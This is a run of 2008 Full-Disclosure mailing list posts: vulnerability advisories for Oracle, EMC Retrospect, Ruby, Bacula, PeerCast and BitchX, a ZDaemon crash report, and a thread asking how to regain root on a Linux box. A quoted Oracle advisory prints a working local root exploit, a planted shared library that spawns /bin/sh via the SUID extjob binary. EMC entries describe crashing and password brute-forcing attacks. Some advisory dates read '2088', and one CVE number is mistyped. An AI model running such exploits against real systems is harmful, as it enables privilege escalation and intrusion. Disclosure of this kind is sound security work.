Re: [Full-disclosure] Pwnie Awards 2008
Hey Alexandr, I see I'm invited to award Brett his pwnie for his SQL flaw if he wins. I'd be more than happy to - after all one bug over 3 years means someone did a really good job ;) Cheers, David -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Oracle Database Local Untrusted Library Path Vulnerability
It is reported to Oracle since 2004 by open3s and affects others libs. The
workaround is very simple but it is "under investigation / being fixed in
main codeline. Scheduled for future cpu"
regards
juan manuel pascual
On Sat, 19 Jul 2008, Joxean Koret wrote:
> Oracle Database Local Untrusted Library Path Vulnerability
> --
>
> The Oracle July 2008 Critical Patch Update fixes a vulnerability which
> allows a user in the OINSTALL/DBA group to scalate privileges to root.
>
> Scalating Privileges from "oracle" to "root"
>
>
> In Oracle 10g R2 and later (Oracle11g is also vulnerable) the affected
> binary, $ORACLE_HOME/bin/extjob, is SUID root and must be suid root. In
> the following forum from Oracle you will found a note at the bottom of
> the page:
>
> (...)
> In 10.2.0.2 and higher
>
> rdbms/admin/externaljob.ora file must must be owned by root:oraclegroup
> and
> be writable only by the owner i.e. 644 (rw-r--r--)
>
> bin/extjob file must be also owned by root:oraclegroup but must be
> setuid i.e. 4750 (-rwsr-x---)
>
> bin/extjobo should have normal 755 (rwxr-xr-x) permissions and be owned
> by
> oracle:oraclegroup
>
> In 11g and higher
>
> Same as 10.2.0.2 but additionally bin/jssu should exist with root
> setuid
> permissions i.e. owned by root:oraclegroup with 4750 (-rwsr-x---)
>
> (...)
>
> The "oraclegroup" is commonly "dba" or "oinstall". Regardless of the
> group's name, if a user can execute OS commands from the database (after
> an attacker gains DBA privileges by abusing from an sql injection
> vulnerability, in example) the user is allowed to execute, modify,
> delete or create new files under the ORACLE_HOME directory.
>
> The following are the linked libraries of the extjob binary:
>
> $ ldd $ORACLE_HOME/bin/extjob
>linux-gate.so.1 => (0xe000)
>libclntsh.so.10.1
> => /home/joxean/oracle10g/product/10.2.0/db_2/lib/libclntsh.so.10.1
> (0xb669d000)
>libdl.so.2 => /lib/tls/i686/cmov/libdl.so.2 (0xb6681000)
>libm.so.6 => /lib/tls/i686/cmov/libm.so.6 (0xb665f000)
>libpthread.so.0 => /lib/tls/i686/cmov/libpthread.so.0
> (0xb664d000)
>libnsl.so.1 => /lib/tls/i686/cmov/libnsl.so.1 (0xb6638000)
>libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb6509000)
>libnnz10.so
> => /home/joxean/oracle10g/product/10.1.0/db_2/lib/libnnz10.so
> (0xb635f000)
>libaio.so.1 => /usr/lib/libaio.so.1 (0xb635c000)
>/lib/ld-linux.so.2 (0xb7f95000)
>
> As you can see, 2 Oracle libraries are linked to the extjob binary. A
> user in the oracle group can't change the binary "extjob" because it's
> owned by root but can change linked libraries to execute arbitrary code
> under the privileges of "root". The following is an example of what can
> be done:
>
> -- Example with libclntsh.so
>
> $ cat test.c
> #include
> #include
> #include
>
>
> void __attribute__ ((constructor)) my_init(void)
> {
> printf("[+] It works! Root shell...\n");
>system("/bin/sh");
> }
>
> $ cc test.c -fPIC -o test.so -shared
> $
> mv /home/joxean/oracle10g/product/10.2.0/db_2/lib/libclntsh.so.10.2
> /home/joxean/oracle10g/product/10.2.0/db_2/lib/.libclntsh.so.10.2
> $ mv
> test.so /home/joxean/oracle10g/product/10.2.0/db_2/lib/libclntsh.so.10.2
> $ $ORACLE_HOME/bin/extjob
> [+] It works! Root shell...
> sh-3.1#
>
> Notes
> -
>
> Despite the privileges needed, the vulnerability can be used in a
> multi-stage attack to gain root privileges.
>
> Workaround
> --
>
> Remove the SUID root bit from the extjob binary.
>
> Disclaimer
> --
>
> The information in this advisory and any of its demonstrations is
> provided "as is" without any warranty of any kind.
>
> I am not liable for any direct or indirect damages caused as a result of
> using the information or demonstrations provided in any part of this
> advisory.
>
> Contact
> ---
>
> Joxean Koret - joxeankoret[at]yahoo[dot]es
>
> References
> --
>
> http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html
> http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=727
> http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2613
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FGA-2008-16: EMC Dantz Retrospect 7 backup Client 7.5.116 NULL-Pointer reference Denial of Service Vulnerability
FGA-2008-16: EMC Dantz Retrospect 7 backup Client 7.5.116 NULL-Pointer reference Denial of Service Vulnerability http://www.fortiguardcenter.com/advisory/FGA-2008-16.html July 20, 2008 -- Affected Vendors: EMC -- Affected Products: EMC Dantz Retrospect 7 backup Client 7.5.116 -- Vulnerability Details: There exists vulnerability in EMC's Retrospect Client 7.5.116. which allows remote attackers to cause a Read Access violation, (Client termination and loss of backup service) via malformed packets to TCP port 497, which triggers an assert error. This is a designed error of EMC Dantz: Using a NULL-Pointer reference by mistake. -- Vendor Response: EMC has issued an update to correct this vulnerability: http://www.emcinsignia.com/updates -- Disclosure Timeline: 2008-04-20 - Vulnerability reported to vendor 2008-06-30 - Vendor issued update 2088-07-20 - Coordinated public release of advisory Acknowledgment: Zhenhua Liu of Fortinet's FortiGuard Global Security Research Team Disclaimer: Although Fortinet has attempted to provide accurate information in these materials, Fortinet assumes no legal responsibility for the accuracy or completeness of the information. More specific information is available on request from Fortinet. Please note that Fortinet's product information does not constitute or contain any guarantee, warranty or legally binding representation, unless expressly identified as such in a duly signed writing. About Fortinet ( www.fortinet.com ): Fortinet is the pioneer and leading provider of ASIC-accelerated unified threat management, or UTM, security systems, which are used by enterprises and service providers to increase their security while reducing total operating costs. Fortinet solutions were built from the ground up to integrate multiple levels of security protection--including firewall, antivirus, intrusion prevention, VPN, spyware prevention and anti-spam -- designed to help customers protect against network and content level threats. Leveraging a custom ASIC and unified interface, Fortinet solutions offer advanced security functionality that scales from remote office to chassis-based solutions with integrated management and reporting. Fortinet solutions have won multiple awards around the world and are the only security products that are certified in six programs by ICSA Labs: (Firewall, Antivirus, IPSec, SSL, Network IPS, and Anti-Spyware). Fortinet is privately held and based in Sunnyvale, California. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FGA-2008-16: EMC Dantz Retrospect 7 backup Server Authentication Module Weak Password Hash Arithmetic Vulnerability
FGA-2008-16: EMC Dantz Retrospect 7 backup Server Authentication Module Weak Password Hash Arithmetic Vulnerability http://www.fortiguardcenter.com/advisory/FGA-2008-16.html July 20, 2008 -- Affected Vendors: EMC -- Affected Products: EMC Dantz Retrospect Backup Server 7.5.508 -- Vulnerability Details: The Hash arithmetic which EMC Dantz Retrospect 7 backup Server Authentication Module used is too simple. Due to the poor hash arithmetic, attacker will gain client's password using brute force without Time-consuming. -- Vendor Response: EMC has issued an update to correct this vulnerability: http://www.emcinsignia.com/updates -- Disclosure Timeline: 2008-04-20 - Vulnerability reported to vendor 2008-06-30 - Vendor issued update 2088-07-20 - Coordinated public release of advisory Acknowledgment: Zhenhua Liu of Fortinet's FortiGuard Global Security Research Team Disclaimer: Although Fortinet has attempted to provide accurate information in these materials, Fortinet assumes no legal responsibility for the accuracy or completeness of the information. More specific information is available on request from Fortinet. Please note that Fortinet's product information does not constitute or contain any guarantee, warranty or legally binding representation, unless expressly identified as such in a duly signed writing. About Fortinet ( www.fortinet.com ): Fortinet is the pioneer and leading provider of ASIC-accelerated unified threat management, or UTM, security systems, which are used by enterprises and service providers to increase their security while reducing total operating costs. Fortinet solutions were built from the ground up to integrate multiple levels of security protection--including firewall, antivirus, intrusion prevention, VPN, spyware prevention and anti-spam -- designed to help customers protect against network and content level threats. Leveraging a custom ASIC and unified interface, Fortinet solutions offer advanced security functionality that scales from remote office to chassis-based solutions with integrated management and reporting. Fortinet solutions have won multiple awards around the world and are the only security products that are certified in six programs by ICSA Labs: (Firewall, Antivirus, IPSec, SSL, Network IPS, and Anti-Spyware). Fortinet is privately held and based in Sunnyvale, California. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FGA-2008-16: EMC Dantz Retrospect 7 backup Client 7.5.116 Remote Memory corruption Vulnerability
FGA-2008-16: EMC Dantz Retrospect 7 backup Client 7.5.116 Remote Memory corruption Vulnerability http://www.fortiguardcenter.com/advisory/FGA-2008-16.html July 20, 2008 -- Affected Vendors: EMC -- Affected Products: EMC Dantz Retrospect 7 backup Client 7.5.116 -- Vulnerability Details: The retroclient.exe process listens, in a default configuration, on TCP port 497. When Continued sending packets with length of 2064 bytes and filling with 0x00, about 30 seconds to 5 minutes the status box shows: “Client networking not available, or service not running” , keep on sending packets and few times later retroclient.exe process terminate, backup service lost, TCP port 497 closed . -- Vendor Response: EMC has issued an update to correct this vulnerability: http://www.emcinsignia.com/updates -- Disclosure Timeline: 2008-04-20 - Vulnerability reported to vendor 2008-06-30 - Vendor issued update 2088-07-20 - Coordinated public release of advisory Acknowledgment: Zhenhua Liu of Fortinet's FortiGuard Global Security Research Team Disclaimer: Although Fortinet has attempted to provide accurate information in these materials, Fortinet assumes no legal responsibility for the accuracy or completeness of the information. More specific information is available on request from Fortinet. Please note that Fortinet's product information does not constitute or contain any guarantee, warranty or legally binding representation, unless expressly identified as such in a duly signed writing. About Fortinet ( www.fortinet.com ): Fortinet is the pioneer and leading provider of ASIC-accelerated unified threat management, or UTM, security systems, which are used by enterprises and service providers to increase their security while reducing total operating costs. Fortinet solutions were built from the ground up to integrate multiple levels of security protection--including firewall, antivirus, intrusion prevention, VPN, spyware prevention and anti-spam -- designed to help customers protect against network and content level threats. Leveraging a custom ASIC and unified interface, Fortinet solutions offer advanced security functionality that scales from remote office to chassis-based solutions with integrated management and reporting. Fortinet solutions have won multiple awards around the world and are the only security products that are certified in six programs by ICSA Labs: (Firewall, Antivirus, IPSec, SSL, Network IPS, and Anti-Spyware). Fortinet is privately held and based in Sunnyvale, California. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] EMC Dantz Retrospect 7 backup Client PlainText Password Hash Disclosure Vulnerability
FGA-2008-16: EMC Dantz Retrospect 7 backup Client PlainText Password Hash Disclosure Vulnerability http://www.fortiguardcenter.com/advisory/FGA-2008-16.html July 20, 2008 -- Affected Vendors: EMC -- Affected Products: EMC Dantz Retrospect 7 backup Client 7.5.116 -- Vulnerability Details: The transfer of Password Hash of EMC Dantz Retrospect 7 backup Client in the network is plaintext. By sending a malicious packet to the client, client will send back lots information including Password Hash resulting in a loss of confidentiality. What is more, EMC Dantz Retrospect 7 backup server's authentication module using weak password hash arithmetic, By buteforce it attacker can gain full control of client's machine -- Vendor Response: EMC has issued an update to correct this vulnerability: http://www.emcinsignia.com/updates -- Disclosure Timeline: 2008-04-20 - Vulnerability reported to vendor 2008-06-30 - Vendor issued update 2088-07-20 - Coordinated public release of advisory Acknowledgment: Zhenhua Liu of Fortinet's FortiGuard Global Security Research Team Disclaimer: Although Fortinet has attempted to provide accurate information in these materials, Fortinet assumes no legal responsibility for the accuracy or completeness of the information. More specific information is available on request from Fortinet. Please note that Fortinet's product information does not constitute or contain any guarantee, warranty or legally binding representation, unless expressly identified as such in a duly signed writing. About Fortinet ( www.fortinet.com ): Fortinet is the pioneer and leading provider of ASIC-accelerated unified threat management, or UTM, security systems, which are used by enterprises and service providers to increase their security while reducing total operating costs. Fortinet solutions were built from the ground up to integrate multiple levels of security protection--including firewall, antivirus, intrusion prevention, VPN, spyware prevention and anti-spam -- designed to help customers protect against network and content level threats. Leveraging a custom ASIC and unified interface, Fortinet solutions offer advanced security functionality that scales from remote office to chassis-based solutions with integrated management and reporting. Fortinet solutions have won multiple awards around the world and are the only security products that are certified in six programs by ICSA Labs: (Firewall, Antivirus, IPSec, SSL, Network IPS, and Anti-Spyware). Fortinet is privately held and based in Sunnyvale, California. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1612-1] New ruby1.8 packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1612-1 [EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff July 21, 2008 http://www.debian.org/security/faq - Package: ruby1.8 Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CVE-2008-2662 CVE-2008-2663 CVE-2008-2664 CVE-2008-2725 CVE-2008-2726 CVE-2008-2376 Several vulnerabilities have been discovered in the interpreter for the Ruby language, which may lead to denial of service or the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2006-2662 Drew Yao discovered that multiple integer overflows in the string processing code may lead to denial of service and potentially the execution of arbitrary code. CVE-2008-2663 Drew Yao discovered that multiple integer overflows in the string processing code may lead to denial of service and potentially the execution of arbitrary code. CVE-2008-2664 Drew Yao discovered that a programming error in the string processing code may lead to denial of service and potentially the execution of arbitrary code. CVE-2008-2725 Drew Yao discovered that an integer overflow in the array handling code may lead to denial of service and potentially the execution of arbitrary code. CVE-2008-2726 Drew Yao discovered that an integer overflow in the array handling code may lead to denial of service and potentially the execution of arbitrary code. CVE-2008-2376 It was discovered that an integer overflow in the array handling code may lead to denial of service and potentially the execution of arbitrary code. For the stable distribution (etch), these problems have been fixed in version 1.8.5-4etch2. For the unstable distribution (sid), these problems have been fixed in version 1.8.7.22-2. We recommend that you upgrade your ruby1.8 packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Stable updates are available for amd64, arm, hppa, i386, ia64, mipsel, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5.orig.tar.gz Size/MD5 checksum: 4434227 aae9676332fcdd52f66c3d99b289878f http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch2.diff.gz Size/MD5 checksum: 100878 f55f4e2a0ca298d6312a8e3c4618da0f http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch2.dsc Size/MD5 checksum: 1079 02286e0f1885c65a9d1fdad5bd933ac7 Architecture independent packages: http://security.debian.org/pool/updates/main/r/ruby1.8/rdoc1.8_1.8.5-4etch2_all.deb Size/MD5 checksum: 309932 0d08bd3d9b467f82df59811dcb4ffd10 http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-elisp_1.8.5-4etch2_all.deb Size/MD5 checksum: 209874 76ab42ff282540121b1ffa23b8c34208 http://security.debian.org/pool/updates/main/r/ruby1.8/irb1.8_1.8.5-4etch2_all.deb Size/MD5 checksum: 235238 d1f242b11d00199ecedf64cac2c6ac44 http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-examples_1.8.5-4etch2_all.deb Size/MD5 checksum: 242330 11359f9774006c02ca68402b1a6c021e http://security.debian.org/pool/updates/main/r/ruby1.8/ri1.8_1.8.5-4etch2_all.deb Size/MD5 checksum: 1228716 cacd1dfc0b53e163adf3090175d85260 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch2_amd64.deb Size/MD5 checksum: 302500 42fb912eed252ddf0c0e0d1ded838375 http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch2_amd64.deb Size/MD5 checksum: 197696 9388576f466a8d757a261653be326a64 http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch2_amd64.deb Size/MD5 checksum: 198304 6dd9e7ffc83e0a343acc5d9360233724 http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch2_amd64.deb Size/MD5 checksum: 1584450 7bfff8f2effc86fefd21cad2ad7aefe2 http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch2_amd64.deb Size/MD5 checksum: 197264 34559ddb2772bd4e4b4e9438da43b012 http://security.debian.org/pool/updates/main/r/ruby1.8/librub
Re: [Full-disclosure] Pwnie Awards 2008
OOPS!: By question I landed on the Server Side Bug Nomination List Again. Thanks for riding this Ceremony. kcope / eliteb0y / Nikos OOPS I did it again (fool(disclosure)) 2008/7/21 David Litchfield <[EMAIL PROTECTED]>: > Hey Alexandr, > I see I'm invited to award Brett his pwnie for his SQL flaw if he wins. I'd > be more than happy to - after all one bug over 3 years means someone did a > really good job ;) > Cheers, > David > > -- > E-MAIL DISCLAIMER > > The information contained in this email and any subsequent > correspondence is private, is solely for the intended recipient(s) and > may contain confidential or privileged information. For those other than > the intended recipient(s), any disclosure, copying, distribution, or any > other action taken, or omitted to be taken, in reliance on such > information is prohibited and may be unlawful. If you are not the > intended recipient and have received this message in error, please > inform the sender and delete this mail and any attachments. > > The views expressed in this email do not necessarily reflect NGS policy. > NGS accepts no liability or responsibility for any onward transmission > or use of emails and attachments having left the NGS domain. > > NGS and NGSSoftware are trading names of Next Generation Security > Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 > 4BF with Company Number 04225835 and VAT Number 783096402 > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200807-10 ] Bacula: Information disclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200807-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Bacula: Information disclosure Date: July 21, 2008 Bugs: #196834 ID: 200807-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A vulnerability in Bacula may allow local attackers to obtain sensitive information. Background == Bacula is a network based backup suite. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 app-backup/bacula < 2.4.1 >= 2.4.1 Description === Matthijs Kooijman reported that the "make_catalog_backup" script uses the MySQL password as a command line argument when invoking other programs. Impact == A local attacker could list the processes on the local machine when the script is running to obtain the MySQL password. Note: The password could also be disclosed via network sniffing attacks when the script fails, in which case it would be sent via cleartext e-mail. Workaround == There is no known workaround at this time. Resolution == A warning about this issue has been added in version 2.4.1, but the issue is still unfixed. We advise not to use the make_catalog_backup script, but to put all MySQL parameters into a dedicated file readable only by the user running Bacula. References == [ 1 ] CVE-2007-5626 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5626 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200807-10.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIhNCSuhJ+ozIKI5gRAh0rAJ0ZFhFvvbJqLAnQiCoYaOBoxEszWwCdH7Bz YvVI1E8ezQdFC8viPEVUEvs= =zejn -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200807-11 ] PeerCast: Buffer overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200807-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: PeerCast: Buffer overflow Date: July 21, 2008 Bugs: #220281 ID: 200807-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A buffer overflow vulnerability in PeerCast may allow for the remote execution of arbitrary code. Background == PeerCast is a client and server for P2P-radio networks. Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-sound/peercast < 0.1218-r1>= 0.1218-r1 Description === Nico Golde reported a boundary error in the HTTP::getAuthUserPass() function when processing overly long HTTP Basic authentication requests. Impact == A remote attacker could send a specially crafted HTTP request to the vulnerable server, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All PeerCast users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-sound/peercast-0.1218-r1" References == [ 1 ] CVE-2008-2040 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2040 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200807-11.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIhOkGuhJ+ozIKI5gRAsPLAJ4pDU1p+l+VMNYTV9L3t4EJXpiNywCfQQX2 mm8f+HZSWkiBOofoc2b8tD0= =6L/C -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200807-12 ] BitchX: Multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200807-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: BitchX: Multiple vulnerabilities Date: July 21, 2008 Bugs: #190667 ID: 200807-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities in BitchX may allow for the remote execution of arbitrary code or symlink attacks. Background == BitchX is an IRC client. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-irc/bitchx <= 1.1-r4 Vulnerable! --- NOTE: Certain packages are still vulnerable. Users should migrate to another package if one is available or wait for the existing packages to be marked stable by their architecture maintainers. Description === bannedit reported a boundary error when handling overly long IRC MODE messages (CVE-2007-4584). Nico Golde reported an insecure creation of a temporary file within the e_hostname() function (CVE-2007-5839). Impact == A remote attacker could entice a user to connect to a malicious IRC server, resulting in the remote execution of arbitrary code with the privileges of the user running the application. A local attacker could perform symlink attacks to overwrite arbitrary files on the local machine. Workaround == There is no known workaround at this time. Resolution == Since BitchX is no longer maintained, we recommend that users unmerge the vulnerable package and switch to another IRC client: # emerge --unmerge "net-irc/bitchx" References == [ 1 ] CVE-2007-4584 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4584 [ 2 ] CVE-2007-5839 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5839 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200807-12.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIhQjhuhJ+ozIKI5gRAs3HAJ9HbqXEu7c8VRBaKr993wCgSdxbdQCdH6JN Tp6jUMMhpK71RfRox8EmpnA= =Q4uI -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NULL pointer in ZDaemon 1.08.07
### Luigi Auriemma Application: ZDaemon http://www.zdaemon.org Versions: <= 1.08.07 Platforms:Windows and Linux Bug: NULL pointer Exploitation: remote, versus server (in-game) Date: 21 Jul 2008 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:aluigi.org ### 1) Introduction 2) Bug 3) The Code 4) Fix ### === 1) Introduction === ZDaemon is one of the most played multiplayer ports of the Doom engine and at the same time one of the most criticized too. ### == 2) Bug == The ZDaemon server is affected by a NULL pointer vulnerability which allows an attacker to crash it when a specific type of command (type 6) is used. The attacker needs to join the server for exploiting this bug so his IP address must be not banned and he must know the right keyword if the server is protected with a password. ### === 3) The Code === http://aluigi.org/poc/zdaemonull.zip ### == 4) Fix == No fix ### --- Luigi Auriemma http://aluigi.org http://backup.aluigi.org http://mirror.aluigi.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Kaminsky's DNS Issue Leaked?
It appears matasano posted an explanation of Dan Kaminsky's DNS issue to their blog today, but looks like it may have been yanked back down. My google reader account nabbed it via the RSS feed while it was up. It looks like maybe they had this typed up, ready to hit "post" as soon as someone else figured it out? They had advance knowledge of the issue via conference calls with Kaminsky. Halvar Flake posted some speculation on what the issue was, but his speculation was not the full issue; only a re-hash of previously known issues. In any event, Halvar's ideas were close, but incomplete. Matasano filled in the missing details, possibly by accident. :) Details: http://blog.invisibledenizen.org/2008/07/kaminskys-dns-issue-accidentally-leaked.html -N ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] help: I need to crack my box
Believe it or not, I have a linux box (mine, yes it's mine) I need to own... the problem is that it phisically resides a few 100km from here and someone else has changed the root password... I can still log in as luser and I wonder if I have a chance to become root again. It's a more or less current debian lenny i386 with gnome. Have you got anything for me? Thanks in advance, Lucio. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] help: I need to crack my box
--On Monday, July 21, 2008 22:47:26 +0200 Lucio Crusca <[EMAIL PROTECTED]> wrote: > Believe it or not, I have a linux box (mine, yes it's mine) I need to own... > the problem is that it phisically resides a few 100km from here and someone > else has changed the root password... I can still log in as luser and I > wonder if I have a chance to become root again. It's a more or less current > debian lenny i386 with gnome. Have you got anything for me? Ask the hosting company if they have an ipkvm they can connect to the box. If they do, you can reboot and go into single user mode and reset the root password. I would then take down the net interfaces until you clean the box. Otherwise your info might be disclosed while you're working on it. If you can't reboot it remotely, have their staff reboot it for you while you're logged in to the ipkvm. Then get into single user mode and regain control of the box. -- Paul Schmehl As if it wasn't already obvious, my opinions are my own and not those of my employer. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2008:151 ] - Updated libxslt packages fix buffer overflow vulnerability
